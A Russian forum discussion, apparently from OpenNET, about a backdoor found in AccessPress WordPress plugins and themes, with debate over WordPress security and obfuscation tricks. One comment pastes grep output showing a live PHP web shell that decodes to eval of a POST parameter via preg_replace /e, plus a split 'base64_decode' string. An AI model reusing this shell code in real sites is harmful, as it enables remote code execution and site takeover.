> Достаточно не прогуливать уроки, в том числе тупя в тель-афон.

Есть чёткое подозрение, что вы не представляете объёмы кода, с которыми приходится работать людям из контор, поддерживающих CMS подобной популярности.

А у AccessPress'а явный косяк в органах надзора за собственными поделиями.
И это уже не столько способность смотреть в код глазами, сколько социальная инженерия среди собственного офиса: люди должны крепко дружить друг с другом и с начальством, но при этом в случае чего -- друг на друга стучать.  Тогда таких косяков будет меньше.

Ответить | Правка | К родителю #38 | Наверх | Cообщить модератору

98. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Аноним (91), 23-Янв-22, 01:03 
> у AccessPress'а явный косяк

У WordPress явный косяк, если он ломается троянами из темы оформления.

Ответить | Правка | Наверх | Cообщить модератору

103. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (12), 23-Янв-22, 01:12 
Если троян в теме, то при чём тут WordPress?
У вас там с логикой всё в порядке?

Могу даже подсказку дать: не надо ставить тему с троянами, и проблемы не будет.

Ответить | Правка | Наверх | Cообщить модератору

112. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (113), 23-Янв-22, 08:42 
А зачем тебе вордпресс без тем?
Ответить | Правка | Наверх | Cообщить модератору

90. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (91), 23-Янв-22, 00:28 
> ... системы управления контентом WordPress, разрабатываемых компанией AccessPress

Внимательно прочти это предложение.

Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору

94. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (12), 23-Янв-22, 00:46 
> ... _для_ системы управления контентом WordPress, разрабатываемых компанией AccessPress ...

Внимательно прочти слово "для" в этом предложении.
AccessPress разрабатывает штуки _для_ пользователей WordPress.
А WordPress разрабатывают в Automatic.

> Наличие вредоносных изменений было выявлено исследователем из компании JetPack (подразделение компании Automatic, занимающейся разработкой WordPress)

Это предложение тоже прочти внимательно.  И Мише скажи, чтобы прочитал.
Мож так понятнее станет.

Ответить | Правка | Наверх | Cообщить модератору

97. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (91), 23-Янв-22, 01:01 
Ты какой-то странный... Что тебе не понятно в слове WordPress? Почему ты его не хочешь замечать?
Ответить | Правка | Наверх | Cообщить модератору

100. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (12), 23-Янв-22, 01:06 
Косяк не в WordPress'е найден.
Перечитай новость.
Ответить | Правка | Наверх | Cообщить модератору

102. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (91), 23-Янв-22, 01:09 
Какая архитектура - такие и косяки. Ты до сих пор не смог прочитать фразу "бэкдор для WordPress"?
Ответить | Правка | Наверх | Cообщить модератору

104. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (12), 23-Янв-22, 01:16 
Чтобы система была полностью защищённой от бэкдоров, она должна быть полностью защищена от запуска в ней стороннего кода.
Поэтому ни тем, ни плагинов под ней не будет.

И кому нужна система без тем и плагинов?

Ответить | Правка | Наверх | Cообщить модератору

109. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Роман (??), 23-Янв-22, 06:26 
Тут благодатная почва - некоторые на данном ресурсе утверждают что им и смартфон то не нужен нынче, весь их мир прост и заранее предсказуем, браузинг в стиле lynx их устраивает. Таким людям конечно никакие темы не нужны, им вообще мало что нужно.
Ответить | Правка | Наверх | Cообщить модератору

149. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (138), 24-Янв-22, 21:06 
Для тем не обязально давать использовать тьюринг полный интерпретатор.
Ответить | Правка | К родителю #104 | Наверх | Cообщить модератору

16. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +7 +/
Сообщение от Аноним (12), 22-Янв-22, 15:26 
> вредоносное содержимое ... закамуфлировано в виде ... base64.
> закамуфлировано

Правильный камуфляж -- это незаметный камуфляж.
А base64 посреди читаемого кода -- это как военные в зелёном камуфляже посреди белого снега.

Ответить | Правка | Наверх | Cообщить модератору

20. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +10 +/
Сообщение от Аноним (20), 22-Янв-22, 15:50 
Мне особенно понравилась строка:
$b64 = 'bas' . 'e64' . '_dec' . 'ode'

10 камуфляжей из 10. Это как наклейка "НЕ ШПИОН" на мундире.

Ответить | Правка | Наверх | Cообщить модератору

24. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +7 +/
Сообщение от Ordu (ok), 22-Янв-22, 16:19 
На эту строку не сработает grep по фразе base64_decode. Это отметает автоматические искалки странностей, основанные на grep'е. А с глазами людей, очевидно, ребята даже не пытались бороться, надеясь, что до использования глаз и мозга не дойдёт.
Ответить | Правка | Наверх | Cообщить модератору

27. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от Аноним (23), 22-Янв-22, 16:21 
Так ведь и правильно надеялись до него очень долго не доходило.  
Ответить | Правка | Наверх | Cообщить модератору

85. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от угу (?), 22-Янв-22, 23:16 
Да вроде - сразу и спалили? Долго не доходило до владельцев плагина - но если они и были авторами или во всяком случае сотрудничали - то до них и не должно было. Пока вротпресс их сам не зобанил.
(потому шта делиться надо!)

Ответить | Правка | Наверх | Cообщить модератору

121. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (23), 23-Янв-22, 13:09 
Сразу в голове пыхеров это через три месяца.  А сколько осталось, а сколько не нашли. Пыхеры неисправимы, неудивительно что над ними все ржут.  
Ответить | Правка | Наверх | Cообщить модератору

56. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (56), 22-Янв-22, 19:15 
> надеясь, что до использования глаз и мозга не дойдёт

Или дойдет, но очень потом

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

29. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Vacu923ek (ok), 22-Янв-22, 16:30 
Ржу :))))))))))
Осталось написать $b64 = "это не вирус! проходите мимо".
Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору

68. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (68), 22-Янв-22, 20:59 
Просто много пробелов, а код весь справа за скроллом не видать уже.
Ответить | Правка | Наверх | Cообщить модератору

73. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 22-Янв-22, 21:26 
> "это не вирус! проходите мимо".

я и прохожу всегда. человек старался как-никак

Ответить | Правка | К родителю #29 | Наверх | Cообщить модератору

17. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Аноним (-), 22-Янв-22, 15:27 
а скриншоты без богомерзкой мелкостудии ну вообще никак невозможно сделать ?
Ответить | Правка | Наверх | Cообщить модератору

19. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от Аноним (19), 22-Янв-22, 15:48 
Сделай!
Ответить | Правка | Наверх | Cообщить модератору

25. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (23), 22-Янв-22, 16:19 
Ты пропитой? Это саблайм.
Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

48. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 22-Янв-22, 18:35 
крякнутый ?
Ответить | Правка | Наверх | Cообщить модератору

52. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (6), 22-Янв-22, 18:55 
Ты походу на чем-то тяжелом. Зачем Саблайм крякать он итак работает. Ты это завязывай.  
Ответить | Правка | Наверх | Cообщить модератору

69. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 22-Янв-22, 21:07 
ты похоже даже не в курсе о чем анонче пишет. посмотри какая у тебя лицензия . или ты только второй день и тебе еще не вылетело окно счастья лол
Ответить | Правка | Наверх | Cообщить модератору

110. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (113), 23-Янв-22, 08:39 
Всё ясно ты солевик больше не заходи сюда больше. Каким образом это окно тебе помешает сделать скриншот. Да даже просто работать неограниченно время оно никак не мешает никому.  
Ответить | Правка | Наверх | Cообщить модератору

122. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 23-Янв-22, 15:07 
> больше не заходи сюда больше

ну и не буду

Ответить | Правка | Наверх | Cообщить модератору

144. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (144), 24-Янв-22, 14:07 
Емакс тут осилит мало кто.
Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

31. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от user90 (?), 22-Янв-22, 16:42 
На чом на чом оно говорите написано? Я даже не буду спрашивать кем))
Ответить | Правка | Наверх | Cообщить модератору

41. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (20), 22-Янв-22, 17:53 
Нет, не на расте. Про него соседняя новость.
Ответить | Правка | Наверх | Cообщить модератору

46. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Онаним (?), 22-Янв-22, 18:03 
Я так понимаю, эти бэкдоры ещё и продавались? :D
Ответить | Правка | Наверх | Cообщить модератору

59. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:25 
это зависит от количества свободы
где свободы больше там могли продаваться
Ответить | Правка | Наверх | Cообщить модератору

47. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Аноним (47), 22-Янв-22, 18:32 
вот тебе и любитель убунту(и любитель раста) который захотел поставить тёмную тему и нарвался на ...
Ответить | Правка | Наверх | Cообщить модератору

50. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (50), 22-Янв-22, 18:45 
С вебом все хорошо!
Ответить | Правка | Наверх | Cообщить модератору

54. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Аноним (40), 22-Янв-22, 19:00 
Те кто не хотят платить за свой штат разарботчиков или хотя бы за аутсорсинг должны страдать и платить за это ... хотя бы репутацией в дальнейшем.

Другое дело, что общество настолько хитрое, что в мою бытность этих сайтошлепов развелось просто уйма и сейчас из каждого клозета рупопром трубит тильда и Битрикс360

Ответить | Правка | Наверх | Cообщить модератору

58. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:21 
это свобода. а вы предпочитаете рабство? с лицензированием каждого движения каждого человека. а ваши все программы уже лицензированы?
Ответить | Правка | Наверх | Cообщить модератору

62. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Мент (?), 22-Янв-22, 19:59 
Свобода - это рабство.
Ответить | Правка | Наверх | Cообщить модератору

63. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от pashev.me (?), 22-Янв-22, 19:59 
Latex, pandoc и hakyll - наше всё.
Ответить | Правка | Наверх | Cообщить модератору

75. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (75), 22-Янв-22, 21:31 
BDSM
Ответить | Правка | Наверх | Cообщить модератору

124. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 23-Янв-22, 16:18 
latex, gimp - наше все. остальное для извращенцев
Ответить | Правка | К родителю #63 | Наверх | Cообщить модератору

64. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от AskerTVemail (ok), 22-Янв-22, 20:02 
На моём WP-сайте, была такая дыра:

<pre>
wp-content# grep -ir str_rot13 *

plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
</pre>

Ответить | Правка | Наверх | Cообщить модератору

99. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –3 +/
Сообщение от Аноним (12), 23-Янв-22, 01:04 
Это не дыра, а это результат предельно топорного взлома, проводимого либо установкой скриптов из непроверенных источников, либо от хитрых заказчиков с бирж фриланса: заказчик просит починить тему (реже плагин), но с условием показа починенной темы на ваших мощностях, потому что у заказчика дескать нет свободного хостинга.

Поэтому вы выполняете банальную починку, заливаете на сайт, демонстрируете работающую тему, и получаете обещанный килорубль.

При этом, если у вас нет ограничения на предельную глубину файлового дерева, к которой имеют доступ php-скрипты, все сайты под вашей учётной записью на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые, содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными бэкдорами (как в данном случае).

А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен будет залив картинок и других вложений.

Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков на биржах фриланса.

Ответить | Правка | Наверх | Cообщить модератору

105. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от AskerTVemail (ok), 23-Янв-22, 01:19 
>[оверквотинг удален]
> тему, и получаете обещанный килорубль.
> При этом, если у вас нет ограничения на предельную глубину файлового дерева,
> к которой имеют доступ php-скрипты, все сайты под вашей учётной записью
> на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые,
> содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными
> бэкдорами (как в данном случае).
> А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен
> будет залив картинок и других вложений.
> Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков
> на биржах фриланса.

Так дело в том, что это я сам скачал WP и установил на свой хостинг (VDS). Потом, пару раз менял VDS-сервер. Архив с копиями сайтов, был где то на диске локального компа. Как то запустил сканирование на вирусы, и сканер нашёл эти скрипты, указав, что это потенциально опасные штуки. Так я узнал, что на одном из VDS, была дыра. После этого, я проверил свои веб-папки. Нигде не встретил подобного случая.

Ответить | Правка | Наверх | Cообщить модератору

127. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Capra (ok), 24-Янв-22, 00:24 
Чем сканировали? Какой Антивирус разбирает php код?
Ответить | Правка | Наверх | Cообщить модератору

137. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от AskerTVemail (ok), 24-Янв-22, 11:00 
> Чем сканировали? Какой Антивирус разбирает php код?

Точно не помню, но по моему, это был стандартный Windows-10 антивирус. Я запустил сканирование, и антивирус нашёл этот код.

Ответить | Правка | Наверх | Cообщить модератору

96. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (91), 23-Янв-22, 00:57 
> бэкдор для системы управления контентом WordPress

Опять WordPress...

Ответить | Правка | Наверх | Cообщить модератору

108. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (108), 23-Янв-22, 04:15 
PHP - жив!
Ответить | Правка | Наверх | Cообщить модератору

114. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Zenitur (ok), 23-Янв-22, 11:22 
> на 360 тысячах сайтов

Кто-нибудь знает хотя бы 30 тысяч сайтов?

Ответить | Правка | Наверх | Cообщить модератору

119. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (23), 23-Янв-22, 13:07 
Любой сайт купи окна, или стрижка собак.  Всем нужен сайт потому что соцсети это выше их ЧСВ.  
Ответить | Правка | Наверх | Cообщить модератору

135. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Онаним (?), 24-Янв-22, 09:49 
Потому что в соцсетях 99% - сопливые подростки, которые прибыль приносят только донатным игроделам.
Ответить | Правка | Наверх | Cообщить модератору

126. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от anonymous (??), 24-Янв-22, 00:20 
Классика, не? Сломали supply chain. Вывод только один - нужно популяризировать альтернативные решения, написанные не на PHP, Ruby или JavaScript. И писать самостоятельно с нуля.
Ответить | Правка | Наверх | Cообщить модератору

129. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (91), 24-Янв-22, 02:11 
> И писать самостоятельно с нуля.

Мудрое решение. Современные фрейм(нон)ворки настолько сложны в своём интерфейсе, а в итоге просто неповоротливые, что проще, быстрее, надёжнее, дешевле, гибче самому написать, чем пытаться засунуть коня в сферический вакуум.

Ответить | Правка | Наверх | Cообщить модератору

136. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Альтернативно одаренный (?), 24-Янв-22, 10:09 
А через два года вашу лапшу никто не хочет брать на доработку, классика
Ответить | Правка | Наверх | Cообщить модератору

130. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от Аноним (130), 24-Янв-22, 03:38 
Пользователи WP должны постоянно страдать. Ситуация когда сайт на WP работает является труднообъяснимым отклонением от нормы.
Ответить | Правка | Наверх | Cообщить модератору

145. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (144), 24-Янв-22, 14:08 
То есть это западный кусочек 1с?
Ответить | Правка | Наверх | Cообщить модератору

147. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (138), 24-Янв-22, 17:02 
> То есть это западный кусочек 1с?

Вообще это удивительный продукт, у вордпреса не самый плохой интерфейс, у его расширений бывает очень крутой интерфейс и функционал, но сам код вопрдпреса, при том, что он открытый - это просто ппц, даже хуже битрикса, хотя по кол-ву отвратительного кода битрикс не переплюнуть.

Ответить | Правка | Наверх | Cообщить модератору

141. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним12345 (?), 24-Янв-22, 13:27 
Распиаренный ворд-пресс настолько дыряв, что я даже не удивлен
Ответить | Правка | Наверх | Cообщить модератору

148. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (138), 24-Янв-22, 17:08 
Никогда не понимал тех, кто в своих проектах прикручивает к шаблонизатору php шаблонизатор, но когда вопрос в установке сторонних шаблонов - тут даже обсуждать нечего, надо было позаботиться об отдельном шаблонизаторе, а не давать каждому шаблоничку полный доступ.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру